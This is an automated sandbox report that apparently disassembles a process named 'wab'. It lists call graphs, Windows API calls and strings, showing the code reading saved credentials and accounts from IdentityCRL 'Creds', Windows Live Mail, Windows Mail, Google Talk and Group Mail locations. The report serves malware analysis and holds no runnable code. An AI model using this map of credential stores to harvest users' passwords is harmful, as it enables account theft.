                  control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • memcpy.MSVCRT ref: 0040FBE4
                  • memcpy.MSVCRT ref: 0040FBF9
                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                  • API String ID: 2768085393-2409096184
                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0044430B
                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                  • memset.MSVCRT ref: 00444379
                  • memset.MSVCRT ref: 00444394
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                  • strlen.MSVCRT ref: 004443DB
                  • _strcmpi.MSVCRT ref: 00444401
                  Strings
                  • \Microsoft\Windows Mail, xrefs: 00444329
                  • Store Root, xrefs: 004443A5
                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                  • API String ID: 832325562-2578778931
                  • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                  • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                  APIs
                  • memset.MSVCRT ref: 0040F567
                  • memset.MSVCRT ref: 0040F57F
                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • memcpy.MSVCRT ref: 0040F652
                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                  • String ID:
                  • API String ID: 2012582556-3916222277
                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                  APIs
                  • memset.MSVCRT ref: 004037EB
                  • memset.MSVCRT ref: 004037FF
                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  • strchr.MSVCRT ref: 0040386E
                  • _mbscpy.MSVCRT ref: 0040388B
                  • strlen.MSVCRT ref: 00403897
                  • sprintf.MSVCRT ref: 004038B7
                  • _mbscpy.MSVCRT ref: 004038CD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                  • String ID: %s@yahoo.com
                  • API String ID: 317221925-3288273942
                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 359 404ae8-404aea 358->359 359->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                  APIs
                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadMessageProc
                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                  • API String ID: 2780580303-317687271
                  • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                  • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                  • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                  • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                  APIs
                  • memset.MSVCRT ref: 00403504
                  • memset.MSVCRT ref: 0040351A
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • _mbscpy.MSVCRT ref: 00403555
                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                  • _mbscat.MSVCRT ref: 0040356D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscatmemset$Close_mbscpystrlen
                  • String ID: InstallPath$Software\Group Mail$fb.dat
                  • API String ID: 3071782539-966475738
                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->382 383 40cd59-40cd60 DeleteObject 381->383 383->382
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                  • String ID:
                  • API String ID: 2054149589-0
                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  • memset.MSVCRT ref: 00408620
                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                  • memset.MSVCRT ref: 00408671
                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                  Strings
                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                  • String ID: Software\Google\Google Talk\Accounts
                  • API String ID: 1366857005-1079885057
                  • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                  • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Cursor_mbsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 882979914-1578091866
                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                  APIs
                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                  • memset.MSVCRT ref: 00410E10
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                  • _mbscpy.MSVCRT ref: 00410E87
                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                  Strings
                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                  • API String ID: 889583718-2036018995
                  • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                  • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                  APIs
                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0
                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                  APIs
                  • memset.MSVCRT ref: 004109F7
                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                  • memset.MSVCRT ref: 00410A32
                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                  • String ID:
                  • API String ID: 3143880245-0
                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@mallocmemcpy
                  • String ID:
                  • API String ID: 3831604043-0
                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                  APIs
                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFontIndirect_mbscpymemset
                  • String ID: Arial
                  • API String ID: 3853255127-493054409
                  • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                  • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                  APIs
                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                  • _strcmpi.MSVCRT ref: 0040CEC3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$_strcmpimemset
                  • String ID: /stext
                  • API String ID: 520177685-3817206916
                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                  APIs
                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                  APIs
                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID:
                  • API String ID: 145871493-0
                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
